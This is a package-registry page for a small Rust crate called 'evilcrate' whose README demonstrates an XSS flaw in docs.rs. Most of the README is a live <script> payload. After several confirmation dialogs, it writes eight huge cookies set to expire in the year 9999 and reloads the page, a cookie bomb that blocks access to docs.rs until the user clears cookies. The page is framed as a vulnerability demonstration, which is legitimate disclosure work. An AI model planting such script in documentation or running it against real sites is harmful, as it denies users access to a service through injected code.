#demonstration #vulnerabilities #cookies #clear #click #xss #afterwards

evilcrate

Demonstration of an XSS vulnerability. Clear cookies afterwards.

3 releases

0.1.2 Mar 21, 2021
0.1.1 Mar 21, 2021
0.1.0 Mar 21, 2021

#5 in #demonstration

MIT license

3KB

🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥

This crate demonstrates an XSS vulnerability of docs.rs. To test, click the link below. In order to access docs.rs afterward, you will need to clear cookies.

🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥

<script> function bootstrap() { const doc1 = 'This is a demonstration of a security vulnerability (XSS). Click CANCEL to abort at any time.'; const doc2 = 'WARNING: If you proceed, you will not be able to access docs.rs. CLICK CANCEL if you do not wish this to happen.'; const doc3 = 'WARNING: To access docs.rs after proceeding, you will need to clear your browser cookies.'; if (!confirm(doc1) || !confirm(doc2) || !confirm(doc3)) { return; } if (prompt('Type "I understand what I need to do" to continue:') !== "I understand what I need to do") { return; } let z = 'z'; for (let i = 0; i < 4000; i++) { z = z + 'z'; } function setCookie(name) { document.cookie = name + '=' + z + '; expires=Fri, 31 Dec 9999 23:59:59 GMT; Path=/'; } ['a','b','c','d','e','f','g','h'].forEach(setCookie); window.location.reload(); } </script>

No runtime deps